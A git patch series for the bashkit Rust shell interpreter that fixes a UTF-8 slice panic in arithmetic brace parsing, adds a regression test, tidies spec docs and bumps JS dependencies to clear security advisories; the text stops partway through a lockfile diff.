From 47dad7b6a281d3828dcf9e815225d00b1b09237c Mon Sep 17 00:00:00 2001 From: Mykhailo Chalyi Date: Sun, 17 May 2026 05:00:21 +0000 Subject: [PATCH 1/7] =?UTF-8?q?fix(interpreter):=20reject=20${#name[?= =?UTF-8?q?=E2=80=A6}=20without=20closing=20bracket=20in=20arithmetic?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit arithmetic_fuzz CI run (2026-05-16) hit a string-slice panic in `expand_brace_expr_in_arithmetic` when input like `${#arr[禧` lacked a closing `]`: `end = rest.len() - 1` landed inside the trailing 3-byte UTF-8 char, panicking the `&rest[bracket + 1..end]` slice. Require `rest.ends_with(']')` before computing `end` so the slice is always on a char boundary; malformed input now returns "0" gracefully, matching the existing `${#[}` no-panic test (TM-DOS-029). Add a UTF-8 regression test covering the exact crash artifact. --- crates/bashkit/src/interpreter/mod.rs | 11 +++++++++-- crates/bashkit/tests/threat_model_tests.rs | 15 +++++++++++++++ 2 files changed, 24 insertions(+), 2 deletions(-) diff --git a/crates/bashkit/src/interpreter/mod.rs b/crates/bashkit/src/interpreter/mod.rs index 2ee09df42..923de6113 100644 --- a/crates/bashkit/src/interpreter/mod.rs +++ b/crates/bashkit/src/interpreter/mod.rs @@ -9167,8 +9167,15 @@ impl Interpreter { // ${#arr[@]} or ${#arr[*]} — array length if let Some(rest) = inner.strip_prefix('#') { if let Some(bracket) = rest.find('[') { - // Guard against malformed input like ${#[} where bracket+1 > len-1 - let end = rest.len().saturating_sub(1); + // Require a closing ']' — anything else (e.g. `${#arr[` with + // an unterminated index, or `${#arr[禧` whose final byte sits + // inside a multi-byte UTF-8 char) is malformed. Without this + // guard `end = rest.len() - 1` could land mid-codepoint and + // panic the slice below. + if !rest.ends_with(']') { + return "0".to_string(); + } + let end = rest.len() - 1; if bracket + 1 > end { // Malformed — treat as string length of empty var return "0".to_string(); diff --git a/crates/bashkit/tests/threat_model_tests.rs b/crates/bashkit/tests/threat_model_tests.rs index 058e93bee..80299aec2 100644 --- a/crates/bashkit/tests/threat_model_tests.rs +++ b/crates/bashkit/tests/threat_model_tests.rs @@ -4009,6 +4009,21 @@ mod trace_events { // Should not panic — just return 0 for malformed expression assert_eq!(r.exit_code, 0); } + + // TM-DOS-029 regression: malformed ${#name[...} (unterminated index) + // whose content ends mid UTF-8 multi-byte char must not panic. + // Discovered by arithmetic_fuzz on 2026-05-16, crash artifact + // `crash-0eb6b53a030c0a10f29e1933480e76c9c1fa3971` — input + // `${#[rg[g([禧,...` made `end = rest.len() - 1` land in the + // middle of `禧` (3-byte UTF-8), panicking the string slice. + #[tokio::test] + async fn arithmetic_malformed_brace_length_utf8_no_panic() { + let mut bash = Bash::new(); + let script = "echo $((${#rg[禧))"; + let r = bash.exec(script).await; + // Either Ok (graceful "0") or Err is fine — must NOT panic. + let _ = r; + } } // ============================================================================= From 3dfc33798e5d0197170dbea41303a0aafedbe6ff Mon Sep 17 00:00:00 2001 From: Mykhailo Chalyi Date: Sun, 17 May 2026 05:01:51 +0000 Subject: [PATCH 2/7] chore(specs): drop resolved deferred items and add credential-injection to AGENTS.md - specs/maintenance.md: #880 (ArgParser migration) and #881 (errexit helper) are both closed; replace the deferred-items table with a short note. - AGENTS.md: spec table was missing `credential-injection` (covered by specs/credential-injection.md). Add it next to the other security-adjacent entries. --- AGENTS.md | 1 + specs/maintenance.md | 9 +++------ 2 files changed, 4 insertions(+), 6 deletions(-) diff --git a/AGENTS.md b/AGENTS.md index 5c5b33bbe..0bd1dd152 100644 --- a/AGENTS.md +++ b/AGENTS.md @@ -47,6 +47,7 @@ Fix root cause. Unsure: read more code; if stuck, ask w/ short options. Unrecogn | interactive-shell | Interactive REPL mode with rustyline line editing | | sqlite-builtin | Embedded SQLite via Turso (MemoryIO + VfsIO backends, dot-commands) | | coreutils-args-port | Port uutils `uu_app()` clap definitions (args mode) and platform-clean uucore modules (module mode, manifest-driven) into bashkit via codegen | +| credential-injection | Transparent per-host credential injection for outbound HTTP requests, without exposing secrets to sandboxed scripts | ### Documentation diff --git a/specs/maintenance.md b/specs/maintenance.md index 58b643835..648aee419 100644 --- a/specs/maintenance.md +++ b/specs/maintenance.md @@ -187,12 +187,9 @@ multi-file refactors, cross-cutting changes), the pass must: Deferred items are **not** failures — they are expected for large-scope improvements. The requirement is that they are **tracked**, not silently skipped. -### Deferred from 2026-03-27 run - -| Issue | Section | Description | -|-------|---------|-------------| -| #880 | Simplification | Migrate 27 builtins from manual arg parsing to ArgParser | -| #881 | Simplification | Extract errexit suppression propagation helper | +_No deferred items currently outstanding. Previously tracked items +(#880 ArgParser migration, #881 errexit propagation helper) have been +resolved._ ## Automation From cb0bb9072d121936276567adf47d304741fbd5ed Mon Sep 17 00:00:00 2001 From: Mykhailo Chalyi Date: Sun, 17 May 2026 05:07:18 +0000 Subject: [PATCH 3/7] fix(deps): resolve dependabot alerts in JS/TS workspaces MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Apply non-breaking upgrades reported by GitHub Dependabot: - site/: npm audit fix bumps astro 6.1.8→6.3.3 (low: GHSA-xr5h-phrj-8vxv, server-island replay), devalue 5.6.3→5.8.1 (high: GHSA-77vg-94rm-hx3p, sparse-array DoS), fast-uri 3.0.1→3.1.2 (high: GHSA-v39h-62p7-jpjc, GHSA-q3j6-qgpj-74h6). - examples/, crates/bashkit-js/: bump pinned langsmith override from 0.5.25 to ^0.6.0 to clear GHSA-3644-q5cj-c5c7 (untrusted-manifest deserialization). `npm install` confirms 0 vulnerabilities. - .deepsec/: bump deepsec 2.0.4→^2.0.8 to pull @anthropic-ai/sdk 0.93.0 (was 0.81.0) and clear GHSA-p7fg-763f-g4gf (insecure default file perms in the local filesystem tool). Remaining 5 moderate alerts in site/ live behind `@astrojs/check` and require a semver-major downgrade (0.9.8 → 0.9.2); they're devDeps only and not actionable inline. --- .deepsec/package.json | 2 +- .deepsec/pnpm-lock.yaml | 182 ++++++++++++------------ crates/bashkit-js/package-lock.json | 6 +- crates/bashkit-js/package.json | 2 +- examples/package-lock.json | 6 +- examples/package.json | 2 +- site/package-lock.json | 209 +++++++++++++++------------- 7 files changed, 219 insertions(+), 190 deletions(-) diff --git a/.deepsec/package.json b/.deepsec/package.json index a60d1d3d4..e42a9657f 100644 --- a/.deepsec/package.json +++ b/.deepsec/package.json @@ -7,6 +7,6 @@ "workspaces": [], "packageManager": "pnpm@9.15.4", "dependencies": { - "deepsec": "^2.0.4" + "deepsec": "^2.0.8" } } diff --git a/.deepsec/pnpm-lock.yaml b/.deepsec/pnpm-lock.yaml index 61c82c777..93ed17c56 100644 --- a/.deepsec/pnpm-lock.yaml +++ b/.deepsec/pnpm-lock.yaml @@ -9,59 +9,59 @@ importers: .: dependencies: deepsec: - specifier: ^2.0.4 - version: 2.0.4(zod@3.24.4) + specifier: ^2.0.8 + version: 2.0.8(zod@3.24.4) packages: - '@anthropic-ai/claude-agent-sdk-darwin-arm64@0.2.132': - resolution: {integrity: sha512-wrGxeqsnhw3JSU25v78FSw85guN0FGqLA7LuAzLe+KVZqJElJvhtae1ceCvgF8e8Bc/RUrniNxRrTur+8vIZYQ==} + '@anthropic-ai/claude-agent-sdk-darwin-arm64@0.2.141': + resolution: {integrity: sha512-9HZ0ot6+FwOfQ1aeMqQLH4IJGMm/DcP08SysDxscVjBm6l2JjqleHohxi3zid0DurfGweqT+4x9GScJffwg55g==} cpu: [arm64] os: [darwin] - '@anthropic-ai/claude-agent-sdk-darwin-x64@0.2.132': - resolution: {integrity: sha512-qiutRtM+cz6FPA2AX2fKaINkLpMO9W48d3s4CTcWPT014uJTRxZZRb5TBxnjdxRLIt6njsqvvvh0XzQLGpblBA==} + '@anthropic-ai/claude-agent-sdk-darwin-x64@0.2.141': + resolution: {integrity: sha512-4iAdarJaQ+2R58s6QJswZCzUdz2WQmL5lYG7Y+FLzWbRSROFfcH0QYpmOqSaPXd2KRQhIJwEacqecDZd/Q1XKQ==} cpu: [x64] os: [darwin] - '@anthropic-ai/claude-agent-sdk-linux-arm64-musl@0.2.132': - resolution: {integrity: sha512-Gu4JCAkXA/XChcrTixtnurSn445O/1EHt2TAlX/rq2gP/wCijKU3eQyZ+YWx2UMud0f9e+E4W/CHhwtCVzgqgw==} + '@anthropic-ai/claude-agent-sdk-linux-arm64-musl@0.2.141': + resolution: {integrity: sha512-6H1AJ/AVaWNnV22kubUPkOTRzZFH0+qP9k7WlhriHMN9gtgZcVAsITMddDeGjQsQJMCAdhXFd6sgi7TM1LdeOQ==} cpu: [arm64] os: [linux] - '@anthropic-ai/claude-agent-sdk-linux-arm64@0.2.132': - resolution: {integrity: sha512-fWyjKRg+qfThhY9iI5GJRNtBW7qBoV20yn8kJ9RoKG4c6yn3Q+QJX+ybkfgXM45RyrO4SPmdhDeTCTG9LJSN3w==} + '@anthropic-ai/claude-agent-sdk-linux-arm64@0.2.141': + resolution: {integrity: sha512-Jdf0ZEwJzOP8sE6rPqdJN+SxMb0/L8sxJg4twCv/7S+Qzk0hJtls+wxSi+0Tjh6EEMaNxJqEGc7S3fx99Wi99Q==} cpu: [arm64] os: [linux] - '@anthropic-ai/claude-agent-sdk-linux-x64-musl@0.2.132': - resolution: {integrity: sha512-Ri7RQkbjOVox0TXTN4g04oiO5bU8WLCH9SdChxaZtS/K76Yu1vV6fYyB/wRoYWuvRLHjOANWUFIGs6O/wK5s0w==} + '@anthropic-ai/claude-agent-sdk-linux-x64-musl@0.2.141': + resolution: {integrity: sha512-fTI1YuM4cxOa4nSgsyMAdB5ELizkWp+w5Ispo4JnnYtcczMAL4D9GBNjWPW0sUzKvjsJOUVim68SmWLWhUOpXQ==} cpu: [x64] os: [linux] - '@anthropic-ai/claude-agent-sdk-linux-x64@0.2.132': - resolution: {integrity: sha512-AAThetjWjCRWQ7IcDTjXLltUB9DJS4S4HpPmTpCOM8muOFWOwpgTmOHe1DJc9uVXbAgFO/WEASDbD4qrsdn0rw==} + '@anthropic-ai/claude-agent-sdk-linux-x64@0.2.141': + resolution: {integrity: sha512-DVjp72f3HmrRYpbneWZZWIqkUht5kTZXS7wXGFiwzLz6eNYEgjjh+GcsnhIi8UOwZUtNiKUrjZnoP38ovFqV8A==} cpu: [x64] os: [linux] - '@anthropic-ai/claude-agent-sdk-win32-arm64@0.2.132': - resolution: {integrity: sha512-8m5L6MlMqIzvx2V/J1gJwhXt9iMfXFvLOmtm1nhzyslc7czJWZQtHUQ8Tr/1rW32t2oEpXqrDhbjrlHgGp9xBQ==} + '@anthropic-ai/claude-agent-sdk-win32-arm64@0.2.141': + resolution: {integrity: sha512-Wm10J6kfbufbPGFELokiJ/7Y5Oqug4Uag3HXFsV8g7TWCpaItx/oqVaJoiGptuAtXQB7xGLQVTuk082wER+Y5w==} cpu: [arm64] os: [win32] - '@anthropic-ai/claude-agent-sdk-win32-x64@0.2.132': - resolution: {integrity: sha512-NNbAHtl/Bew6HUvOW8R27r/pwwctZbScGAKAxt/p4GiYa0oLKvxq/CGLv+wscRVlebeI0hA6DwC0DtnB0KnA1Q==} + '@anthropic-ai/claude-agent-sdk-win32-x64@0.2.141': + resolution: {integrity: sha512-IXuP29YJuWbR5Q6xOHrjFVGG54V2s1FC61UVNwEN5fpxL09MwPnbwtQL6fqgzt/U1MP7vWAwpXZriYAklkH/mg==} cpu: [x64] os: [win32] - '@anthropic-ai/claude-agent-sdk@0.2.132': - resolution: {integrity: sha512-3hCkfbHi6d73QcNqgrjU9zXGdNs3BrwWnxV90p+DDFARtnwbszkkEm4nz9c80af3nzGBRVvKNZPVCqVaBrkO0g==} + '@anthropic-ai/claude-agent-sdk@0.2.141': + resolution: {integrity: sha512-AIBacMWGcZIUcXlUoObqjwJ6pmJI3BayAqPAFXuvSq3DHJXdiuZVs7l/zTB5l3nRhRv5cqSrI2XbiDeHgZWizw==} engines: {node: '>=18.0.0'} peerDependencies: zod: ^4.0.0 - '@anthropic-ai/sdk@0.81.0': - resolution: {integrity: sha512-D4K5PvEV6wPiRtVlVsJHIUhHAmOZ6IT/I9rKlTf84gR7GyyAurPJK7z9BOf/AZqC5d1DhYQGJNKRmV+q8dGhgw==} + '@anthropic-ai/sdk@0.93.0': + resolution: {integrity: sha512-q9vaSZQVFx6B/gPxetGYfLXSJD5v0sOmh0OpZDq7yCrTSA+Rscvrtyol7JJTW40wEpQB4U1B4JXzxQitbQ3CAA==} hasBin: true peerDependencies: zod: ^3.25.0 || ^4.0.0 @@ -142,12 +142,12 @@ packages: resolution: {integrity: sha512-UycprH3T6n3jH0k44NHMa7pnFHGu/N05MjojYr+Mc6I7obkoLIJujSWwin1pCvdy/eOxrI/l3uDLQsmcrOb4ug==} engines: {node: '>= 20'} - '@vercel/oidc@3.4.0': - resolution: {integrity: sha512-p0sKfHkfRmMaqqDwNL4tjnX9TgRrLMlEtUjIxfrEns8pOxz1R9ztqOVI+ehqiq93/2/HnfPe/UBZkfAZwnx0UA==} + '@vercel/oidc@3.4.1': + resolution: {integrity: sha512-H6B+/ig/GoahccL3WZjiHayHw1H5KhvTJNceqYulwfK9kkz5iul2hTmYzcJ7tTCQzyd0dutuL9xYFZCyLUqsog==} engines: {node: '>= 20'} - '@vercel/sandbox@1.10.0': - resolution: {integrity: sha512-rGA8KJB5ZwQeygzsndgrbHsys3HGWKHQaRQlmyIEHce2BFuTfQUgivHDj5DCZhWiyjjSEodLHpoJkZBd95K0/Q==} + '@vercel/sandbox@1.10.2': + resolution: {integrity: sha512-rWhYfIyW0Va0gFxtz434LhVirV+eQs+AK0QQWtsOPw2oTvOSA4iogQqemRqvRPPbqI8nfZOz6kbCsytVa20gdw==} '@workflow/serde@4.1.0-beta.2': resolution: {integrity: sha512-8kkeoQKLDaKXefjV5dbhBj2aErfKp1Mc4pb6tj8144cF+Em5SPbyMbyLCHp+BVrFfFVCBluCtMx+jjvaFVZGww==} @@ -182,8 +182,8 @@ packages: resolution: {integrity: sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==} engines: {node: 18 || 20 || >=22} - bare-events@2.8.2: - resolution: {integrity: sha512-riJjyv1/mHLIPX4RwiK+oW9/4c3TEUeORHKefKAKnZ5kyslbN+HXowtbaVEqt4IMUB7OXlfixcs6gsFeo/jhiQ==} + bare-events@2.8.3: + resolution: {integrity: sha512-HdUm8EMQBLaJvGUdidNNbqpA1kYkwNcb+MYxkxCLAPJGQzlv9J0C24h8V65Z4c5GLd/JEALDvpFCQgpLJqc0zw==} peerDependencies: bare-abort-controller: '*' peerDependenciesMeta: @@ -194,8 +194,8 @@ packages: resolution: {integrity: sha512-oP5VkATKlNwcgvxi0vM0p/D3n2C3EReYVX+DNYs5TjZFn/oQt2j+4sVJtSMr18pdRr8wjTcBl6LoV+FUwzPmNA==} engines: {node: '>=18'} - brace-expansion@5.0.5: - resolution: {integrity: sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==} + brace-expansion@5.0.6: + resolution: {integrity: sha512-kLpxurY4Z4r9sgMsyG0Z9uzsBlgiU/EFKhj/h91/8yHu0edo7XuixOIH3VcJ8kkxs6/jPzoI6U9Vj3WqbMQ94g==} engines: {node: 18 || 20 || >=22} bytes@3.1.2: @@ -222,6 +222,10 @@ packages: resolution: {integrity: sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==} engines: {node: '>= 0.6'} + content-type@2.0.0: + resolution: {integrity: sha512-j/O/d7GcZCyNl7/hwZAb606rzqkyvaDctLmckbxLzHvFBzTJHuGEdodATcP3yIRoDrLHkIATJuvzbFlp/ki2cQ==} + engines: {node: '>=18'} + cookie-signature@1.2.2: resolution: {integrity: sha512-D76uU73ulSXrD1UXF4KE2TMxVVwhsnCgfAyTg9k8P6KGZjlXKrOLe4dJQKI3Bxi5wjesZoFXJWElNWBjPZMbhg==} engines: {node: '>=6.6.0'} @@ -247,8 +251,8 @@ packages: supports-color: optional: true - deepsec@2.0.4: - resolution: {integrity: sha512-pP1yq2l3BQjjclLop9odoDji0hSVdJ5Q8i2XrAE3F/4rPHZtp+tMo3oaT2ZGXDIzmwp8vGvOtwnX1Qbs90Iu4g==} + deepsec@2.0.8: + resolution: {integrity: sha512-hbbsFK9g38LPiIKTS9VIPj4lUKafvK74WgaRPTdZ17mkuJe4e9f3ydVip194Ib6pkFe0sbk7LnoDKc++iMqZfA==} hasBin: true depd@2.0.0: @@ -296,8 +300,8 @@ packages: resolution: {integrity: sha512-CRT1WTyuQoD771GW56XEZFQ/ZoSfWid1alKGDYMmkt2yl8UXrVR4pspqWNEcqKvVIzg6PAltWjxcSSPrboA4iA==} engines: {node: '>=18.0.0'} - express-rate-limit@8.5.1: - resolution: {integrity: sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ==} + express-rate-limit@8.5.2: + resolution: {integrity: sha512-5Kb34ipNX694DH48vN9irak1Qx30nb0PLYHXfJgw4YEjiC3ZEmZJhwOp+VfiCYwFzvFTdB9QkArYS5kXa2cx2A==} engines: {node: '>= 16'} peerDependencies: express: '>= 4.11' @@ -350,8 +354,8 @@ packages: resolution: {integrity: sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==} engines: {node: '>= 0.4'} - hono@4.12.18: - resolution: {integrity: sha512-RWzP96k/yv0PQfyXnWjs6zot20TqfpfsNXhOnev8d1InAxubW93L11/oNUc3tQqn2G0bSdAOBpX+2uDFHV7kdQ==} + hono@4.12.19: + resolution: {integrity: sha512-xa3eYXYXx68XTT4hZ7dRzsXBhaq85ToSrlUJNoR0gwz/1Ap/CNwX47wfvV7pc/xWhjKVVkLT7zBJy8chhNguqQ==} engines: {node: '>=16.9.0'} http-errors@2.0.1: @@ -479,8 +483,8 @@ packages: resolution: {integrity: sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==} engines: {node: '>= 0.10'} - qs@6.15.1: - resolution: {integrity: sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==} + qs@6.15.2: + resolution: {integrity: sha512-Rzq0KEyX/w/tEybncDgdkZrJgVUsUMk3xjh3t5bv3S1HTAtg+uOYt72+ZfwiQwKdysThkTBdL/rTi6HDmX9Ddw==} engines: {node: '>=0.6'} range-parser@1.2.1: @@ -551,8 +555,8 @@ packages: tar-stream@3.1.7: resolution: {integrity: sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==} - tar@7.5.14: - resolution: {integrity: sha512-/7sHKgQO3JLP9ESlwTYUUftHUadOURUqq23xs1vjcnp8Vss6k0wCfzulyEtk5g91pjvnuriimGlyG7k6msrzRw==} + tar@7.5.15: + resolution: {integrity: sha512-dzGK0boVlC4W5QFuQN1EFSl3bIDYsk7Tj40U6eIBnK2k/8ml7TZ5agbI5j5+qnoVcAA+rNtBml8SEiLxZpNqRQ==} engines: {node: '>=18'} text-decoder@1.2.7: @@ -565,9 +569,9 @@ packages: ts-algebra@2.0.0: resolution: {integrity: sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==} - type-is@2.0.1: - resolution: {integrity: sha512-OZs6gsjF4vMp32qrCbiVSkrFmXtG/AZhY3t0iAMrMBiAZyV9oALtXO8hsrHbMXF9x6L3grlFuwW2oAz7cav+Gw==} - engines: {node: '>= 0.6'} + type-is@2.1.0: + resolution: {integrity: sha512-faYHw0anBbc/kWF3zFTEnxSFOAGUX9GFbOBthvDdLsIlEoWOFOtS0zgCiQYwIskL9iGXZL3kAXD8OoZ4GmMATA==} + engines: {node: '>= 18'} undici@7.25.0: resolution: {integrity: sha512-xXnp4kTyor2Zq+J1FfPI6Eq3ew5h6Vl0F/8d9XU5zZQf1tX9s2Su1/3PiMmUANFULpmksxkClamIZcaUqryHsQ==} @@ -611,49 +615,49 @@ packages: snapshots: - '@anthropic-ai/claude-agent-sdk-darwin-arm64@0.2.132': + '@anthropic-ai/claude-agent-sdk-darwin-arm64@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk-darwin-x64@0.2.132': + '@anthropic-ai/claude-agent-sdk-darwin-x64@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk-linux-arm64-musl@0.2.132': + '@anthropic-ai/claude-agent-sdk-linux-arm64-musl@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk-linux-arm64@0.2.132': + '@anthropic-ai/claude-agent-sdk-linux-arm64@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk-linux-x64-musl@0.2.132': + '@anthropic-ai/claude-agent-sdk-linux-x64-musl@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk-linux-x64@0.2.132': + '@anthropic-ai/claude-agent-sdk-linux-x64@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk-win32-arm64@0.2.132': + '@anthropic-ai/claude-agent-sdk-win32-arm64@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk-win32-x64@0.2.132': + '@anthropic-ai/claude-agent-sdk-win32-x64@0.2.141': optional: true - '@anthropic-ai/claude-agent-sdk@0.2.132(zod@3.24.4)': + '@anthropic-ai/claude-agent-sdk@0.2.141(zod@3.24.4)': dependencies: - '@anthropic-ai/sdk': 0.81.0(zod@3.24.4) + '@anthropic-ai/sdk': 0.93.0(zod@3.24.4) '@modelcontextprotocol/sdk': 1.29.0(zod@3.24.4) zod: 3.24.4 optionalDependencies: - '@anthropic-ai/claude-agent-sdk-darwin-arm64': 0.2.132 - '@anthropic-ai/claude-agent-sdk-darwin-x64': 0.2.132 - '@anthropic-ai/claude-agent-sdk-linux-arm64': 0.2.132 - '@anthropic-ai/claude-agent-sdk-linux-arm64-musl': 0.2.132 - '@anthropic-ai/claude-agent-sdk-linux-x64': 0.2.132 - '@anthropic-ai/claude-agent-sdk-linux-x64-musl': 0.2.132 - '@anthropic-ai/claude-agent-sdk-win32-arm64': 0.2.132 - '@anthropic-ai/claude-agent-sdk-win32-x64': 0.2.132 + '@anthropic-ai/claude-agent-sdk-darwin-arm64': 0.2.141 + '@anthropic-ai/claude-agent-sdk-darwin-x64': 0.2.141 + '@anthropic-ai/claude-agent-sdk-linux-arm64': 0.2.141 + '@anthropic-ai/claude-agent-sdk-linux-arm64-musl': 0.2.141 + '@anthropic-ai/claude-agent-sdk-linux-x64': 0.2.141 + '@anthropic-ai/claude-agent-sdk-linux-x64-musl': 0.2.141 + '@anthropic-ai/claude-agent-sdk-win32-arm64': 0.2.141 + '@anthropic-ai/claude-agent-sdk-win32-x64': 0.2.141 transitivePeerDependencies: - '@cfworker/json-schema' - supports-color - '@anthropic-ai/sdk@0.81.0(zod@3.24.4)': + '@anthropic-ai/sdk@0.93.0(zod@3.24.4)': dependencies: json-schema-to-ts: 3.1.1 optionalDependencies: @@ -661,9 +665,9 @@ snapshots: '@babel/runtime@7.29.2': {} - '@hono/node-server@1.19.14(hono@4.12.18)': + '@hono/node-server@1.19.14(hono@4.12.19)': dependencies: - hono: 4.12.18 + hono: 4.12.19 '@isaacs/fs-minipass@4.0.1': dependencies: @@ -671,7 +675,7 @@ snapshots: '@modelcontextprotocol/sdk@1.29.0(zod@3.24.4)': dependencies: - '@hono/node-server': 1.19.14(hono@4.12.18) + '@hono/node-server': 1.19.14(hono@4.12.19) ajv: 8.20.0 ajv-formats: 3.0.1(ajv@8.20.0) content-type: 1.0.5 @@ -680,8 +684,8 @@ snapshots: eventsource: 3.0.7 eventsource-parser: 3.0.8 express: 5.2.1 - express-rate-limit: 8.5.1(express@5.2.1) - hono: 4.12.18 + express-rate-limit: 8.5.2(express@5.2.1) + hono: 4.12.19 jose: 6.2.3 json-schema-typed: 8.0.2 pkce-challenge: 5.0.1 @@ -724,9 +728,9 @@ snapshots: '@vercel/oidc@3.2.0': {} - '@vercel/oidc@3.4.0': {} + '@vercel/oidc@3.4.1': {} - '@vercel/sandbox@1.10.0': + '@vercel/sandbox@1.10.2': dependencies: '@vercel/oidc': 3.2.0 '@workflow/serde': 4.1.0-beta.2 @@ -768,7 +772,7 @@ snapshots: balanced-match@4.0.4: {} - bare-events@2.8.2: {} + bare-events@2.8.3: {} body-parser@2.2.2: dependencies: @@ -778,13 +782,13 @@ snapshots: http-errors: 2.0.1 iconv-lite: 0.7.2 on-finished: 2.4.1 - qs: 6.15.1 + qs: 6.15.2 raw-body: 3.0.2 - type-is: 2.0.1 + type-is: 2.1.0 transitivePeerDependencies: - supports-color - brace-expansion@5.0.5: + brace-expansion@5.0.6: dependencies: balanced-match: 4.0.4 @@ -806,6 +810,8 @@ snapshots: content-type@1.0.5: {} + content-type@2.0.0: {} + cookie-signature@1.2.2: {} cookie@0.7.2: {} @@ -825,16 +831,16 @@ snapshots: dependencies: ms: 2.1.3 - deepsec@2.0.4(zod@3.24.4): + deepsec@2.0.8(zod@3.24.4): dependencies: - '@anthropic-ai/claude-agent-sdk': 0.2.132(zod@3.24.4) + '@anthropic-ai/claude-agent-sdk': 0.2.141(zod@3.24.4) '@openai/codex': 0.125.0 '@openai/codex-sdk': 0.125.0 - '@vercel/oidc': 3.4.0 - '@vercel/sandbox': 1.10.0 + '@vercel/oidc': 3.4.1 + '@vercel/sandbox': 1.10.2 jiti: 2.7.0 minimatch: 10.2.5 - tar: 7.5.14 + tar: 7.5.15 transitivePeerDependencies: - '@cfworker/json-schema' - bare-abort-controller @@ -868,7 +874,7 @@ snapshots: events-universal@1.0.1: dependencies: - bare-events: 2.8.2 + bare-events: 2.8.3 transitivePeerDependencies: - bare-abort-controller @@ -878,7 +884,7 @@ snapshots: dependencies: eventsource-parser: 3.0.8 - express-rate-limit@8.5.1(express@5.2.1): + express-rate-limit@8.5.2(express@5.2.1): dependencies: express: 5.2.1 ip-address: 10.2.0 @@ -905,13 +911,13 @@ snapshots: once: 1.4.0 parseurl: 1.3.3 proxy-addr: 2.0.7 - qs: 6.15.1 + qs: 6.15.2 range-parser: 1.2.1 router: 2.2.0 send: 1.2.1 serve-static: 2.2.1 statuses: 2.0.2 - type-is: 2.0.1 + type-is: 2.1.0 vary: 1.1.2 transitivePeerDependencies: - supports-color @@ -965,7 +971,7 @@ snapshots: dependencies: function-bind: 1.1.2 - hono@4.12.18: {} + hono@4.12.19: {} http-errors@2.0.1: dependencies: @@ -1018,7 +1024,7 @@ snapshots: minimatch@10.2.5: dependencies: - brace-expansion: 5.0.5 + brace-expansion: 5.0.6 minipass@7.1.3: {} @@ -1059,7 +1065,7 @@ snapshots: forwarded: 0.2.0 ipaddr.js: 1.9.1 - qs@6.15.1: + qs@6.15.2: dependencies: side-channel: 1.1.0 @@ -1169,7 +1175,7 @@ snapshots: - bare-abort-controller - react-native-b4a - tar@7.5.14: + tar@7.5.15: dependencies: '@isaacs/fs-minipass': 4.0.1 chownr: 3.0.0 @@ -1187,9 +1193,9 @@ snapshots: ts-algebra@2.0.0: {} - type-is@2.0.1: + type-is@2.1.0: dependencies: - content-type: 1.0.5 + content-type: 2.0.0 media-typer: 1.1.0 mime-types: 3.0.2 diff --git a/crates/bashkit-js/package-lock.json b/crates/bashkit-js/package-lock.json index d471ad84e..712d0267f 100644 --- a/crates/bashkit-js/package-lock.json +++ b/crates/bashkit-js/package-lock.json @@ -3703,9 +3703,9 @@ "license": "MIT" }, "node_modules/langsmith": { - "version": "0.5.25", - "resolved": "https://registry.npmjs.org/langsmith/-/langsmith-0.5.25.tgz", - "integrity": "sha512-AG7NOymrDmwaWq+wus5hJHZjPFKXwsEdfqGBU3eZiF5242mme+5wuJocdBJKGyU1kgBO7TuLHiqtdyIwl4V4yQ==", + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/langsmith/-/langsmith-0.6.3.tgz", + "integrity": "sha512-pXrQ4/4myQvjFFOAUmt5pWRrLEZR20gzIJD7MNdUH+5/S5nLI4ZRBo/SYKC6coaYj9pYTfQdBIzcs+3kfJ5uDA==", "dev": true, "license": "MIT", "dependencies": { diff --git a/crates/bashkit-js/package.json b/crates/bashkit-js/package.json index a5517f3e2..4a1847973 100644 --- a/crates/bashkit-js/package.json +++ b/crates/bashkit-js/package.json @@ -111,7 +111,7 @@ "zod": "^3" }, "overrides": { - "langsmith": "0.5.25", + "langsmith": "^0.6.0", "uuid": "14.0.0" }, "ava": { diff --git a/examples/package-lock.json b/examples/package-lock.json index 1e9fe7939..ac106f363 100644 --- a/examples/package-lock.json +++ b/examples/package-lock.json @@ -366,9 +366,9 @@ "license": "(AFL-2.1 OR BSD-3-Clause)" }, "node_modules/langsmith": { - "version": "0.5.25", - "resolved": "https://registry.npmjs.org/langsmith/-/langsmith-0.5.25.tgz", - "integrity": "sha512-AG7NOymrDmwaWq+wus5hJHZjPFKXwsEdfqGBU3eZiF5242mme+5wuJocdBJKGyU1kgBO7TuLHiqtdyIwl4V4yQ==", + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/langsmith/-/langsmith-0.6.3.tgz", + "integrity": 